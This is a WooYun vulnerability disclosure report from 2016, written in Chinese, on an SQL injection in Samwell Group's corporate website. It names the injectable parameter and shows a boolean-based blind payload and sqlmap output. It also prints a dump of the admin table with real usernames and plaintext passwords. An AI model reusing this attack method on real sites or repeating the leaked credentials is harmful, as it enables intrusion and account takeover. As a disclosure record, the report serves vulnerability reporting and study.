当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167280

漏洞标题:Samwell集团主站sql注入(涉及管理员明文密码)(臺灣地區)

相关厂商:Samwell Group-RUGGEDBOOK

漏洞作者: 路人甲

提交时间:2016-01-05 16:52

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

Samwell集团主站sql注入#2(涉及管理员明文密码)

详细说明:

注入点

http://**.**.**.**/html/application.asp?appid=1


单引号报错

Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e10'
[Microsoft][ODBC Microsoft Access Driver]COUNT 欄位不正確
/html/application.asp, 列90


sqlmap跑起来

Place: GET
Parameter: appid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: appid=1 AND 9082=9082
---
[16:16:45] [INFO] testing Microsoft Access
[16:16:46] [INFO] confirming Microsoft Access
[16:16:47] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


Database: Microsoft_Access_masterdb
[7 tables]
+-------------+
| adm         |
| alliances   |
| application |
| company     |
| new         |
| solutions   |
| us          |
+-------------+


接下来爆管理员

Table: adm
[4 entries]
+---------+---------------+---------+-----+----------+
| id      | ip            | name    | off | password |
+---------+---------------+---------+-----+----------+
| admin   | **.**.**.**  | <blank> | 0   | 8888     |
| sambest | **.**.**.** | Sambest | 0   | 23215165 |
| samtech | <blank>       | Samtech | 0   | 09464640 |
| samwell | **.**.**.**    | Samwell | 0   | 14011247 |
+---------+---------------+---------+-----+----------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-08 03:39

厂商回复:

感謝通報

最新状态:

暂无